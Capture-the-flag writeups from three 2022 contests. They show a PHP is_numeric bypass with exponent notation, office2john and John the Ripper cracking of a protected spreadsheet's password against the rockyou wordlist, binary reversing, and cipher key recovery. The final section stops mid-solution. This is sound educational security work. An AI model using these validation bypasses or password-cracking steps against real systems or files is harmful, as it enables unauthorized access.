Damncon 2022 Writeup

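This contest was held from 2022/12/22 0:00 (JST) to 2022/12/25 0:00 (JST).
I took part with my team again this time. We scored 134 points and placed 91st out of 637 teams.
Here are writeups for the challenges I solved myself.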

Test - CTF (web)

$ curl https://test-ctf.dsphctf.repl.co/source.txt
<?php
require 'function.php';

$dev = $_GET['number'];
if (isset($dev)) {
	if (is_numeric($dev)){
		if (!strpos($dev, ".")){
			if (strlen($dev) > 6){
				if ($dev < 99999 && $dev > 90000)
				echo 'Flag:  '.'Damncon{FAKE_FLAGS}';
				else
				print '<div class="alert">Oh Oh Think again</div>';
			} else
				print '<h1>Wrong Move Champ</h1>';
		} else
		print '<h1>Not That hard . keep trying</h1>';	
	} else
		print '</h1>Just read the source code once again</h1>';
}
?>

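For example, if number is set to 95000e0, $dev is equivalent to 95000, so the conditions are satisfied: is_numeric() accepts exponent notation, the string contains no ".", and it is 7 characters long.
Accessing https://test-ctf.dsphctf.repl.co/?number=95000e0 displayed the flag.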

DAMNCON{Q4L3URPGHJMA65C}
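
Why the nested checks accept a non-canonical number, and what a strict validator does with the same inputs. This is an added example, not part of the original writeup or the challenge: it is a Python model of the PHP checks, the numeric-string regex is an approximation of PHP 8's is_numeric() rules, and the function names and every sample input except 95000e0 are constructed for illustration.

```python
import re

# Approximation (assumption) of the numeric-string grammar PHP 8's is_numeric()
# accepts: optional whitespace, optional sign, integer or decimal, optional exponent.
_WS = r'[ \t\n\r\v\f]*'
PHP_NUMERIC = re.compile(
    _WS + r'[+-]?(?:[0-9]+\.?[0-9]*|\.[0-9]+)(?:[eE][+-]?[0-9]+)?' + _WS)

# Canonical decimal integer: digits only, no sign, no leading zeros.
CANONICAL_INT = re.compile(r'0|[1-9][0-9]*')


def loose_check(dev):
    """Model of the four nested checks in source.txt."""
    if not PHP_NUMERIC.fullmatch(dev):
        return 'not numeric'
    # !strpos($dev, ".") is true when "." is absent (false) and also when it
    # sits at offset 0, because 0 is falsy in PHP.
    if dev.find('.') > 0:
        return 'contains dot'
    if len(dev) <= 6:
        return 'too short'
    # A numeric string compared with an integer is compared by value.
    value = float(dev)
    return 'flag' if 90000 < value < 99999 else 'out of range'


def strict_check(dev):
    """Same length and range rules, but only canonical integers count as numbers."""
    if not CANONICAL_INT.fullmatch(dev):
        return 'rejected'
    if len(dev) <= 6:
        return 'too short'
    return 'flag' if 90000 < int(dev) < 99999 else 'out of range'


# Constructed validator test inputs; only 95000e0 appears in the writeup.
SAMPLES = ['95000', '95000.0', '95000e0', '0095000', '.9500e5', '9500000', 'abc']


def compare(samples=SAMPLES):
    """Return {input: (loose result, strict result)} for each sample."""
    return {s: (loose_check(s), strict_check(s)) for s in samples}


if __name__ == '__main__':
    for s, (loose, strict) in compare().items():
        print('%-10r loose=%-13s strict=%s' % (s, loose, strict))
```

With canonical-integer validation the length rule and the range rule contradict each other, so no input reaches the flag branch; in PHP the equivalent tightening is a digits-only check plus `strpos(...) === false`.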

WELCOME CHALLENGE (general)

The value of the id parameter in the URL is missing "%" characters, so insert "%" where needed.

DAMNCON%25%25%25%25%25%25%25%25%7BWELCOM_2022%25%25%25%25%25%25%25%25%7D

URL-decode this with CyberChef or a similar tool.

DAMNCON%%%%%%%%{WELCOM_2022%%%%%%%%}

Removing the "%" characters gave the flag.

DAMNCON{WELCOM_2022}

Giffy (crypto)

An animated GIF is attached.
The numbers are displayed in the following order.

144
141
155
156
143
157
156
173
147
151
146
137
143
162
141
143
153
145
144
175

Decode them as octal ASCII codes.

#!/usr/bin/env python3
codes = ['144', '141', '155', '156', '143', '157', '156', '173', '147', '151',
    '146', '137', '143', '162', '141', '143', '153', '145', '144', '175']

flag = ''
for code in codes:
    flag += chr(int(code, 8))
print(flag)

damncon{gif_cracked}

Webnux (web)

I looked at the HTML source, but there was nothing there. Looking at static/scripts.js, which the page loads, the flag was written in a comment.

const cdPrinter = () => {
    /* flag: damncon{shunux_web_cracked} */
    let cdDiv = document.createElement("p")
    cdDiv.innerHTML = "Ohh... You Hackoor? Sorry kid it's just a website not a machine"
    cdDiv.setAttribute("class", "ag output-row")
    siteContainer.insertBefore(cdDiv, currentTerminalDiv)
}

damncon{shunux_web_cracked}

X-MAS CTF 2022 Writeup

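This contest was held from 2022/12/17 5:00 (JST) to 2022/12/22 5:00 (JST).
I took part with my team again this time. We scored 83 points and placed 163rd out of 816 teams.
Here are writeups for the challenges I solved myself.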

Welcome to X-MAS (Misc)

The flag was written in the challenge description.

X-MAS{W3lc0m3_7o_x-m4s2022}

Hop onto Discord (Misc)

After joining the Discord server, the flag was written in the topic of the #general channel.

X-MAS{D15c0rd_1s_s4nt4's_f4v0ur1t3_hub}

pingCTF 2022 Writeup

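This contest was held from 2022/12/17 9:00 (JST) to 2022/12/19 9:00 (JST).
I took part with my team again this time. We scored 700 points and placed 27th out of 174 teams.
Here are writeups for the challenges I solved myself.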

welcome (misc)

After joining the Discord server, the topic of the #rules channel says the following.

Are you here for the flag? :eyes:
try messaging our facebook bot.. Maybe it will tell you something...
Make sure to firstly read all the rules! :eyes:
PS: have you tried pinging for !flag?

I typed and sent "!flag" to PING PG on Facebook Messenger, and after answering its questions, the flag was displayed.

ping{W3lc0m3_t0_p1ngCTF_2022!_3c08b6c9a06c7db}

guess what (misc)

After clearing the PoW, the task is split into three parts.
First, work through the Part 1 code.

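・strings: array of every arrangement of i characters drawn from "A" and "B" (the rounds run i from 2 to 17)
・indexToRemove: random integer less than the length of strings
・removedString = strings[indexToRemove]
・Remove removedString from strings
・Shuffle strings
・Display the list of strings
 → We just need to answer with the removedString that was removed.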

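Using set, take the XOR (symmetric difference) of the two lists to extract the removed string.
Next, work through the Part 2 code. The only difference from Part 1 is the dictionary; just change "AB" to "ABCD".
Finally, work through the Part 3 code. This time the flag has been removed from the array of all permutations of the contents of ping{}. Extract the removed flag the same way as before and format it as ping{xxx}.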

#!/usr/bin/env python3
import socket
import re
import itertools
import hashlib

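def recvuntil(s, tail):
    # Read one byte at a time until the buffer contains `tail`.
    data = b''
    while True:
        if tail in data:
            return data.decode()
        chunk = s.recv(1)
        if not chunk:
            # Peer closed the connection; do not spin forever on b''.
            raise EOFError('connection closed before %r' % tail)
        data += chunk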

def solve_pow(prefix, result, unknown_count):
    possibilities = itertools.product('0123456789abcdef', repeat=unknown_count)
    for ans in possibilities:
        answer = ''.join(ans)
        if hashlib.sha256((prefix + answer).encode()).hexdigest() == result:
            return answer

intro_dictionary = 'AB'
mid_dictionary = 'ABCD'

s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect(('guess_what.ctf.knping.pl', 20000))

data = recvuntil(s, b'\n').rstrip()
print(data)
pattern = r'sha256\("(.+) \+ \?\?\?\?\?\?"\) == "(.+)"'
m = re.search(pattern, data)
prefix = m.group(1)
result = m.group(2)
unknown_count = 6
solution = solve_pow(prefix, result, unknown_count)
data = recvuntil(s, b'> ')
print(data + solution)
s.sendall(solution.encode() + b'\n')

for _ in range(3):
    data = recvuntil(s, b'\n').rstrip()
    print(data)
data = recvuntil(s, b'...')
print(data)
s.sendall(b'\n')

for i in range(2, 18):
    data = recvuntil(s, b'...\n').rstrip()
    print(data)

    removed_strings = []
    while True:
        data = recvuntil(s, b'\n').rstrip()
        print(data)
        if 'PRINTING' in data:
            break
        else:
            removed_strings.append(data)

    strings = ["".join(x)
        for x in itertools.product(intro_dictionary, repeat=i)]
    removedString = list(set(removed_strings) ^ set(strings))[0]

    data = recvuntil(s, b'\n').rstrip()
    print(data)
    data = recvuntil(s, b'> ')
    print(data + removedString)
    s.sendall(removedString.encode() + b'\n')
    data = recvuntil(s, b'\n').rstrip()
    print(data)

for _ in range(4):
    data = recvuntil(s, b'\n').rstrip()
    print(data)
data = recvuntil(s, b'...')
print(data)
s.sendall(b'\n')

for i in range(2, 6):
    data = recvuntil(s, b'...\n').rstrip()
    print(data)

    removed_strings = []
    while True:
        data = recvuntil(s, b'\n').rstrip()
        print(data)
        if 'PRINTING' in data:
            break
        else:
            removed_strings.append(data)

    strings = ["".join(x)
        for x in itertools.product(mid_dictionary, repeat=6)]
    removedString = list(set(removed_strings) ^ set(strings))[0]

    data = recvuntil(s, b'\n').rstrip()
    print(data)
    data = recvuntil(s, b'> ')
    print(data + removedString)
    s.sendall(removedString.encode() + b'\n')
    data = recvuntil(s, b'\n').rstrip()
    print(data)

data = recvuntil(s, b'\n').rstrip()
print(data)
data = recvuntil(s, b'...')
print(data)
s.sendall(b'\n')

data = recvuntil(s, b'...\n').rstrip()
print(data)

removed_flags = []
while True:
    data = recvuntil(s, b'\n').rstrip()
    #print(data)
    if 'PRINTING' in data:
        break
    else:
        removed_flags.append(data)

flags = ["".join(x) for x in itertools.permutations(removed_flags[-1])]
real_flag = list(set(removed_flags) ^ set(flags))[0]
flag = 'ping{%s}' % real_flag

data = recvuntil(s, b'\n').rstrip()
print(data)
data = recvuntil(s, b'> ')
print(data + flag)
s.sendall(flag.encode() + b'\n')
data = recvuntil(s, b'\n').rstrip()
print(data)

The execution result is as follows.

sha256("3eb7fe0d1d480a7d12d04043612cd9e536 + ??????") == "2c8e6e6c38cee110fb9d1718e7eced8485a136888585fbf9d5883525bc748289"
> 409e29
Hi, this is my game :)
I will give you some sTrInGs, and you will have to tell me, which one is missing, seems easy, right? :D
Let's try it out!
Press enter to continue...
PRINTING...
BA
AA
AB
DONE PRINTING
Which one is missing?
> BB
Correct!
PRINTING...
ABB
BAA
AAA
BAB
ABA
BBB
BBA
DONE PRINTING
Which one is missing?
> AAB
Correct!
    :
    :
You are doing great! Now, let's try something harder!
I will give you AGAIN some StRiNgS, and you will have to tell me, which one is missing, seems still doable, right? :D
But I need you to hurry this time, so you will have to guess the missing string in 5 seconds.
Let's try it out!
Press enter to continue...
PRINTING...
ADDADA
DCCCCB
BBBAAA
AADBCA
DDCCAD
    :
    :
Ok. This is kinda spooky. This time I will show you that I know everything, and you will have to prove me wrong in order to get the flag.
Press enter to continue...
PRINTING...
If you are so smart, then you should be able to give the flag in 15 seconds!
> ping{4nF8ai2e9d}
Correct! Here is your flag: ping{4nF8ai2e9d}

ping{4nF8ai2e9d}

high school grades (misc)

It is an xlsx file, but it is password-protected.

$ office2john HS_Grades_December_2022.xlsx > hash.txt
$ john --wordlist=dict/rockyou.txt hash.txt
Using default input encoding: UTF-8
Loaded 1 password hash (Office, 2007/2010/2013 [SHA1 256/256 AVX2 8x / SHA512 256/256 AVX2 4x AES])
Cost 1 (MS Office version) is 2013 for all loaded hashes
Cost 2 (iteration count) is 100000 for all loaded hashes
Will run 2 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
1234567          (HS_Grades_December_2022.xlsx)
1g 0:00:00:00 DONE (2022-12-17 12:20) 6.250g/s 100.0p/s 100.0c/s 100.0C/s 123456..jessica
Use the "--show" option to display all of the cracked passwords reliably
Session completed

Open the Excel file with the password "1234567". The following two cells of the Grades_December_2022 sheet contain the following.

D9: ApnL3omr,ih?
E9: AigssatrgtO3

Cells L3 and O3 contain "{" and "}", so remove the "A" and substitute those cell references.

D9: pn{omr,ih?
E9: igssatrgt}

Interleaving the two strings character by character gives the flag.

ping{sosmart,right?}

baby rev (rev)

Decompile it with Ghidra.

undefined8 main(void)

{
  char cVar1;
  long in_FS_OFFSET;
  undefined local_78 [104];
  long local_10;
  
  local_10 = *(long *)(in_FS_OFFSET + 0x28);
  puts("Hi! I\'m baby rev!");
  puts("I\'m a baby reverse engineering challenge!");
  puts("I\'m not very good at reversing, but I\'m trying my best!");
  puts("Can you help me?");
  puts("Please tell me the first flag!");
  printf("Input: ");
  __isoc99_scanf(&DAT_001020c7,local_78);
  cVar1 = checkflag(local_78);
  if (cVar1 == '\0') {
    puts("Incorrect! :(( But definitely try next time!!!!");
  }
  else {
    puts("Correct! :) So happy for you!!!");
  }
  if (local_10 != *(long *)(in_FS_OFFSET + 0x28)) {
                    /* WARNING: Subroutine does not return */
    __stack_chk_fail();
  }
  return 0;
}

undefined8 checkflag(char *param_1)

{
  bool bVar1;
  undefined8 uVar2;
  long in_FS_OFFSET;
  int local_40;
  int local_3c;
  char acStack56 [40];
  long local_10;
  
  local_10 = *(long *)(in_FS_OFFSET + 0x28);
  if ((((*param_1 == 'p') && (param_1[1] == 'i')) && (param_1[2] == 'n')) &&
     (((param_1[3] == 'g' && (param_1[4] == '{')) && (param_1[0x25] == '}')))) {
    bVar1 = true;
  }
  else {
    bVar1 = false;
  }
  if (bVar1) {
    for (local_40 = 0; local_40 < 0x20; local_40 = local_40 + 1) {
      acStack56[local_40] = param_1[(long)local_40 + 5];
    }
    for (local_3c = 0; local_3c < 0x99; local_3c = local_3c + 1) {
      if ((*(uint *)(&KEYS + (long)(local_3c % 0xe) * 4) ^ (int)acStack56[local_3c % 0x1f]) * 4 +
          local_3c * 2 != *(int *)(FLAG + (long)local_3c * 4)) {
        uVar2 = 0;
        goto LAB_00101336;
      }
    }
    uVar2 = 1;
  }
  else {
    uVar2 = 0;
  }
LAB_00101336:
  if (local_10 != *(long *)(in_FS_OFFSET + 0x28)) {
                    /* WARNING: Subroutine does not return */
    __stack_chk_fail();
  }
  return uVar2;
}
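
The comparison in checkflag can be inverted one table entry at a time. The following is an added example, not the original author's solver: KEYS and the first 32 dwords of FLAG are transcribed from the Ghidra listing on this page, the function names are assumptions, and the flag body is assumed to be printable ASCII.

```python
# KEYS: the 14 dwords at 0x00104020 in the listing (1, 3, 3, 7, U"PING ROCKS").
KEYS = [1, 3, 3, 7] + [ord(c) for c in 'PING ROCKS']

# First 32 little-endian dwords of FLAG (0x00104060..0x001040df in the listing).
FLAG_HEAD = [
    0x1cc, 0x0c2, 0x1d8, 0x0d6, 0x090, 0x0f2, 0x208, 0x0b2,
    0x12c, 0x046, 0x0c4, 0x1f2, 0x0ac, 0x04a, 0x1a8, 0x0de,
    0x190, 0x172, 0x1a4, 0x07e, 0x0b4, 0x0f2, 0x1b8, 0x096,
    0x070, 0x046, 0x0ac, 0x0aa, 0x0b8, 0x0c2, 0x0c4, 0x212,
]

N_KEYS = 0x0e   # local_3c % 0xe selects the key dword
N_CHARS = 0x1f  # local_3c % 0x1f selects the input character


def encode(chars, count):
    """Forward transform from checkflag: (KEYS[i % 14] ^ c[i % 31]) * 4 + i * 2."""
    return [((KEYS[i % N_KEYS] ^ chars[i % N_CHARS]) * 4 + i * 2) & 0xffffffff
            for i in range(count)]


def recover(table):
    """Invert the transform; every table entry must agree on its character."""
    chars = [None] * N_CHARS
    for i, want in enumerate(table):
        scaled = want - i * 2
        if scaled < 0 or scaled % 4:
            raise ValueError('entry %d is not of the form 4*x + 2*i' % i)
        c = (scaled // 4) ^ KEYS[i % N_KEYS]
        if not 0x20 <= c < 0x7f:
            raise ValueError('entry %d decodes to non-printable byte %#x' % (i, c))
        slot = i % N_CHARS
        # Indexes 31 and up revisit earlier characters with a different key,
        # which gives a consistency check on the transcription.
        if chars[slot] is not None and chars[slot] != c:
            raise ValueError('entries disagree on character %d' % slot)
        chars[slot] = c
    if None in chars:
        raise ValueError('table too short to cover all %d characters' % N_CHARS)
    return bytes(chars)


if __name__ == '__main__':
    body = recover(FLAG_HEAD)
    # Re-encoding the recovered characters must reproduce the table.
    assert encode(body, len(FLAG_HEAD)) == FLAG_HEAD
    print(body.decode())
```

The loop copies 0x20 characters into acStack56 but only ever indexes 0..30, so the character at param_1[36] is not constrained by this comparison.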

                             KEYS                                            XREF[3]:     Entry Point(*), 
                                                                                          checkflag:001012e3(*), 
                                                                                          checkflag:001012ea(R)  
        00104020 01              ??         01h
        00104021 00              ??         00h
        00104022 00              ??         00h
        00104023 00              ??         00h
        00104024 03              ??         03h
        00104025 00              ??         00h
        00104026 00              ??         00h
        00104027 00              ??         00h
        00104028 03              ??         03h
        00104029 00              ??         00h
        0010402a 00              ??         00h
        0010402b 00              ??         00h
        0010402c 07              ??         07h
        0010402d 00              ??         00h
        0010402e 00              ??         00h
        0010402f 00              ??         00h
        00104030 50 00 00        unicode32  U"PING ROCKS"
                 00 49 00 
                 00 00 4e 
        0010405c 00              ??         00h
        0010405d 00              ??         00h
        0010405e 00              ??         00h
        0010405f 00              ??         00h

                             FLAG                                            XREF[3]:     Entry Point(*), 
                                                                                          checkflag:0010130b(*), 
                                                                                          checkflag:00101312(R)  
        00104060 cc 01 00        undefine
                 00 c2 00 
                 00 00 d8 
           00104060 cc              undefined1CCh                     [0]                               XREF[3]:     Entry Point(*), 
                                                                                                                     checkflag:0010130b(*), 
                                                                                                                     checkflag:00101312(R)  
           00104061 01              undefined101h                     [1]
           00104062 00              undefined100h                     [2]
           00104063 00              undefined100h                     [3]
           00104064 c2              undefined1C2h                     [4]
           00104065 00              undefined100h                     [5]
           00104066 00              undefined100h                     [6]
           00104067 00              undefined100h                     [7]
           00104068 d8              undefined1D8h                     [8]
           00104069 01              undefined101h                     [9]
           0010406a 00              undefined100h                     [10]
           0010406b 00              undefined100h                     [11]
           0010406c d6              undefined1D6h                     [12]
           0010406d 00              undefined100h                     [13]
           0010406e 00              undefined100h                     [14]
           0010406f 00              undefined100h                     [15]
           00104070 90              undefined190h                     [16]
           00104071 00              undefined100h                     [17]
           00104072 00              undefined100h                     [18]
           00104073 00              undefined100h                     [19]
           00104074 f2              undefined1F2h                     [20]
           00104075 00              undefined100h                     [21]
           00104076 00              undefined100h                     [22]
           00104077 00              undefined100h                     [23]
           00104078 08              undefined108h                     [24]
           00104079 02              undefined102h                     [25]
           0010407a 00              undefined100h                     [26]
           0010407b 00              undefined100h                     [27]
           0010407c b2              undefined1B2h                     [28]
           0010407d 00              undefined100h                     [29]
           0010407e 00              undefined100h                     [30]
           0010407f 00              undefined100h                     [31]
           00104080 2c              undefined12Ch                     [32]
           00104081 01              undefined101h                     [33]
           00104082 00              undefined100h                     [34]
           00104083 00              undefined100h                     [35]
           00104084 46              undefined146h                     [36]
           00104085 00              undefined100h                     [37]
           00104086 00              undefined100h                     [38]
           00104087 00              undefined100h                     [39]
           00104088 c4              undefined1C4h                     [40]
           00104089 00              undefined100h                     [41]
           0010408a 00              undefined100h                     [42]
           0010408b 00              undefined100h                     [43]
           0010408c f2              undefined1F2h                     [44]
           0010408d 01              undefined101h                     [45]
           0010408e 00              undefined100h                     [46]
           0010408f 00              undefined100h                     [47]
           00104090 ac              undefined1ACh                     [48]
           00104091 00              undefined100h                     [49]
           00104092 00              undefined100h                     [50]
           00104093 00              undefined100h                     [51]
           00104094 4a              undefined14Ah                     [52]
           00104095 00              undefined100h                     [53]
           00104096 00              undefined100h                     [54]
           00104097 00              undefined100h                     [55]
           00104098 a8              undefined1A8h                     [56]
           00104099 01              undefined101h                     [57]
           0010409a 00              undefined100h                     [58]
           0010409b 00              undefined100h                     [59]
           0010409c de              undefined1DEh                     [60]
           0010409d 00              undefined100h                     [61]
           0010409e 00              undefined100h                     [62]
           0010409f 00              undefined100h                     [63]
           001040a0 90              undefined190h                     [64]
           001040a1 01              undefined101h                     [65]
           001040a2 00              undefined100h                     [66]
           001040a3 00              undefined100h                     [67]
           001040a4 72              undefined172h                     [68]
           001040a5 01              undefined101h                     [69]
           001040a6 00              undefined100h                     [70]
           001040a7 00              undefined100h                     [71]
           001040a8 a4              undefined1A4h                     [72]
           001040a9 01              undefined101h                     [73]
           001040aa 00              undefined100h                     [74]
           001040ab 00              undefined100h                     [75]
           001040ac 7e              undefined17Eh                     [76]
           001040ad 00              undefined100h                     [77]
           001040ae 00              undefined100h                     [78]
           001040af 00              undefined100h                     [79]
           001040b0 b4              undefined1B4h                     [80]
           001040b1 00              undefined100h                     [81]
           001040b2 00              undefined100h                     [82]
           001040b3 00              undefined100h                     [83]
           001040b4 f2              undefined1F2h                     [84]
           001040b5 00              undefined100h                     [85]
           001040b6 00              undefined100h                     [86]
           001040b7 00              undefined100h                     [87]
           001040b8 b8              undefined1B8h                     [88]
           001040b9 01              undefined101h                     [89]
           001040ba 00              undefined100h                     [90]
           001040bb 00              undefined100h                     [91]
           001040bc 96              undefined196h                     [92]
           001040bd 00              undefined100h                     [93]
           001040be 00              undefined100h                     [94]
           001040bf 00              undefined100h                     [95]
           001040c0 70              undefined170h                     [96]
           001040c1 00              undefined100h                     [97]
           001040c2 00              undefined100h                     [98]
           001040c3 00              undefined100h                     [99]
           001040c4 46              undefined146h                     [100]
           001040c5 00              undefined100h                     [101]
           001040c6 00              undefined100h                     [102]
           001040c7 00              undefined100h                     [103]
           001040c8 ac              undefined1ACh                     [104]
           001040c9 00              undefined100h                     [105]
           001040ca 00              undefined100h                     [106]
           001040cb 00              undefined100h                     [107]
           001040cc aa              undefined1AAh                     [108]
           001040cd 00              undefined100h                     [109]
           001040ce 00              undefined100h                     [110]
           001040cf 00              undefined100h                     [111]
           001040d0 b8              undefined1B8h                     [112]
           001040d1 00              undefined100h                     [113]
           001040d2 00              undefined100h                     [114]
           001040d3 00              undefined100h                     [115]
           001040d4 c2              undefined1C2h                     [116]
           001040d5 00              undefined100h                     [117]
           001040d6 00              undefined100h                     [118]
           001040d7 00              undefined100h                     [119]
           001040d8 c4              undefined1C4h                     [120]
           001040d9 00              undefined100h                     [121]
           001040da 00              undefined100h                     [122]
           001040db 00              undefined100h                     [123]
           001040dc 12              undefined112h                     [124]
           001040dd 02              undefined102h                     [125]
           001040de 00              undefined100h                     [126]
           001040df 00              undefined100h                     [127]
           001040e0 cc              undefined1CCh                     [128]
           001040e1 01              undefined101h                     [129]
           001040e2 00              undefined100h                     [130]
           001040e3 00              undefined100h                     [131]
           001040e4 3e              undefined13Eh                     [132]
           001040e5 01              undefined101h                     [133]
           001040e6 00              undefined100h                     [134]
           001040e7 00              undefined100h                     [135]
           001040e8 38              undefined138h                     [136]
           001040e9 02              undefined102h                     [137]
           001040ea 00              undefined100h                     [138]
           001040eb 00              undefined100h                     [139]
           001040ec 1a              undefined11Ah                     [140]
           001040ed 01              undefined101h                     [141]
           001040ee 00              undefined100h                     [142]
           001040ef 00              undefined100h                     [143]
           001040f0 94              undefined194h                     [144]
           001040f1 01              undefined101h                     [145]
           001040f2 00              undefined100h                     [146]
           001040f3 00              undefined100h                     [147]
           001040f4 d6              undefined1D6h                     [148]
           001040f5 01              undefined101h                     [149]
           001040f6 00              undefined100h                     [150]
           001040f7 00              undefined100h                     [151]
           001040f8 d0              undefined1D0h                     [152]
           001040f9 00              undefined100h                     [153]
           001040fa 00              undefined100h                     [154]
           001040fb 00              undefined100h                     [155]
           001040fc de              undefined1DEh                     [156]
           001040fd 00              undefined100h                     [157]
           001040fe 00              undefined100h                     [158]
           001040ff 00              undefined100h                     [159]
           00104100 a0              undefined1A0h                     [160]
           00104101 00              undefined100h                     [161]
           00104102 00              undefined100h                     [162]
           00104103 00              undefined100h                     [163]
           00104104 12              undefined112h                     [164]
           00104105 01              undefined101h                     [165]
           00104106 00              undefined100h                     [166]
           00104107 00              undefined100h                     [167]
           00104108 28              undefined128h                     [168]
           00104109 01              undefined101h                     [169]
           0010410a 00              undefined100h                     [170]
           0010410b 00              undefined100h                     [171]
           0010410c 0a              undefined10Ah                     [172]
           0010410d 02              undefined102h                     [173]
           0010410e 00              undefined100h                     [174]
           0010410f 00              undefined100h                     [175]
           00104110 c8              undefined1C8h                     [176]
           00104111 01              undefined101h                     [177]
           00104112 00              undefined100h                     [178]
           00104113 00              undefined100h                     [179]
           00104114 ee              undefined1EEh                     [180]
           00104115 01              undefined101h                     [181]
           00104116 00              undefined100h                     [182]
           00104117 00              undefined100h                     [183]
           00104118 e8              undefined1E8h                     [184]
           00104119 01              undefined101h                     [185]
           0010411a 00              undefined100h                     [186]
           0010411b 00              undefined100h                     [187]
           0010411c b6              undefined1B6h                     [188]
           0010411d 00              undefined100h                     [189]
           0010411e 00              undefined100h                     [190]
           0010411f 00              undefined100h                     [191]
           00104120 d4              undefined1D4h                     [192]
           00104121 00              undefined100h                     [193]
           00104122 00              undefined100h                     [194]
           00104123 00              undefined100h                     [195]
           00104124 3e              undefined13Eh                     [196]
           00104125 02              undefined102h                     [197]
           00104126 00              undefined100h                     [198]
           00104127 00              undefined100h                     [199]
           00104128 60              undefined160h                     [200]
           00104129 02              undefined102h                     [201]
           0010412a 00              undefined100h                     [202]
           0010412b 00              undefined100h                     [203]
           0010412c 62              undefined162h                     [204]
           0010412d 01              undefined101h                     [205]
           0010412e 00              undefined100h                     [206]
           0010412f 00              undefined100h                     [207]
           00104130 50              undefined150h                     [208]
           00104131 01              undefined101h                     [209]
           00104132 00              undefined100h                     [210]
           00104133 00              undefined100h                     [211]
           00104134 6a              undefined16Ah                     [212]
           00104135 00              undefined100h                     [213]
           00104136 00              undefined100h                     [214]
           00104137 00              undefined100h                     [215]
           00104138 78              undefined178h                     [216]
           00104139 00              undefined100h                     [217]
           0010413a 00              undefined100h                     [218]
           0010413b 00              undefined100h                     [219]
           0010413c 9e              undefined19Eh                     [220]
           0010413d 00              undefined100h                     [221]
           0010413e 00              undefined100h                     [222]
           0010413f 00              undefined100h                     [223]
           00104140 8c              undefined18Ch                     [224]
           00104141 01              undefined101h                     [225]
           00104142 00              undefined100h                     [226]
           00104143 00              undefined100h                     [227]
           00104144 ca              undefined1CAh                     [228]

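We just need to trace the conditions along the path where checkflag returns 1.

・Indices 0-4 are "ping{"
・Index 37 is "}"
・Treating indices 5-36 as new indices 0-31, the following condition must hold:
 ・(KEYS[i % 14] ^ acStack56[i % 31]) * 4 + i * 2 == FLAG[i]

Index 31 can therefore be anything, so adjust it based on the result and try making it the same character as index 36.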

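#!/usr/bin/env python3

with open('baby_rev', 'rb') as f:
    data = f.read()

# KEYS: 14 little-endian 32-bit values read from file offset 0x3020
KEYS = []
for i in range(0x3020, 0x3020 + 14 * 4, 4):
    k = int.from_bytes(data[i:i+4], byteorder='little')
    KEYS.append(k)

# FLAG: 0x99 little-endian 32-bit values read from file offset 0x3060
FLAG = []
for i in range(0x3060, 0x3060 + 0x99 * 4, 4):
    f = int.from_bytes(data[i:i+4], byteorder='little')
    FLAG.append(f)

# Invert (KEYS[i % 14] ^ c) * 4 + i * 2 == FLAG[i] for every i.
# Each position i % 31 is recovered several times and all results must agree.
flag = [-1] * 31
for i in range(0x99):
    f = ((FLAG[i] - i * 2) // 4) ^ KEYS[i % 14]
    if flag[i % 31] == -1:
        flag[i % 31] = f
    else:
        assert flag[i % 31] == f

flag = ''.join([chr(i) for i in flag])
# Index 31 is unconstrained, so repeat the last recovered character
flag += flag[-1]
flag = 'ping{%s}' % flag
print(flag)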
ping{r3v3rs1ng_c4n_b3_S0_muCH_FUN!!!!}

dialog (crypto)

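The encryption process is outlined below.

・key: the flag
・dialog = DialogEncryption(key)
 ・dialog.key = key
・message: a known fixed string
・encrypted = dialog.encrypt(message)
 ・encoded = ''
 ・For each index i of message, do the following:
  ・key_c: the character of dialog.key at index i % (length of dialog.key)
  ・encoded_c: the character whose code is (ASCII code of message[i] + ASCII code of key_c) mod 256
  ・Append encoded_c to encoded
 ・Base64-encode encoded and return it
・Output encrypted

Compute the shift amounts from the plaintext and the ciphertext to recover the flag.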

#!/usr/bin/env python3
import base64

message = "Hi Alice, I'm Bob. I'm sending you a secret message. I hope you can decrypt it."

with open('out.txt', 'r') as f:
    encrypted = f.read()

encoded = base64.b64decode(encrypted).decode()

flag = ''
for i in range(len(message)):
    flag += chr((ord(encoded[i]) - ord(message[i])) % 256)

flag = flag[:flag.find('}') + 1]
print(flag)
ping{B451c5_0f_3ncrypt10n_t00_345y?-K3y_r3tr13v3d!}
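
The known-plaintext recovery above as a self-contained round trip (an added example, not the challenge's code): encrypt() follows the outline above, SAMPLE_KEY is a constructed stand-in for the flag, and the UTF-8 encoding before Base64 is an assumption taken from the solver's .decode() call. Instead of cutting at "}", it takes the smallest period of the recovered key stream, which works for keys without a closing brace.

```python
import base64

# Known message from the writeup; SAMPLE_KEY is constructed for this example.
MESSAGE = ("Hi Alice, I'm Bob. I'm sending you a secret message. "
           "I hope you can decrypt it.")
SAMPLE_KEY = "ping{c0nstruct3d_k3y}"


def encrypt(key: str, message: str) -> str:
    """Add the repeating key to the message mod 256, then Base64 the result."""
    encoded = "".join(
        chr((ord(m) + ord(key[i % len(key)])) % 256)
        for i, m in enumerate(message)
    )
    # Assumption: the string is UTF-8 encoded before Base64.
    return base64.b64encode(encoded.encode()).decode()


def keystream(ciphertext_b64: str, known_plaintext: str) -> str:
    """Subtract the known plaintext from the ciphertext, position by position."""
    encoded = base64.b64decode(ciphertext_b64).decode()
    if len(encoded) != len(known_plaintext):
        raise ValueError("ciphertext and known plaintext differ in length")
    return "".join(
        chr((ord(c) - ord(p)) % 256) for c, p in zip(encoded, known_plaintext)
    )


def smallest_period(stream: str) -> int:
    """Length of the shortest prefix that, repeated, reproduces the stream."""
    for period in range(1, len(stream) + 1):
        if all(stream[i] == stream[i % period] for i in range(len(stream))):
            return period
    return len(stream)


def recover_key(ciphertext_b64: str, known_plaintext: str) -> str:
    """Recover the key, or only its prefix if the message is shorter than it."""
    stream = keystream(ciphertext_b64, known_plaintext)
    return stream[:smallest_period(stream)]


if __name__ == "__main__":
    ct = encrypt(SAMPLE_KEY, MESSAGE)
    print(recover_key(ct, MESSAGE))
```

If the known message is shorter than the key, only that many leading key characters can be recovered.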

toss a coin to your witcher (crypto)

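Guessing that this is a Vigenere cipher, I first try decrypting the first line with https://www.guballa.de/vigenere-solver. On this site, if the text is too long, the decrypted output is cut off partway. Looking at the key, it is "lambertwhataprick".
I decrypt the second line the same way. The key comes out as "rtwhatapricklambe". The key is shifted for the second line, so the key for the whole text appears to be "lambertwhataprick".
I then decrypt the full text with https://www.dcode.fr/vigenere-cipher, specifying "LAMBERTWHATAPRICK" as the key. The decrypted result is as follows.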

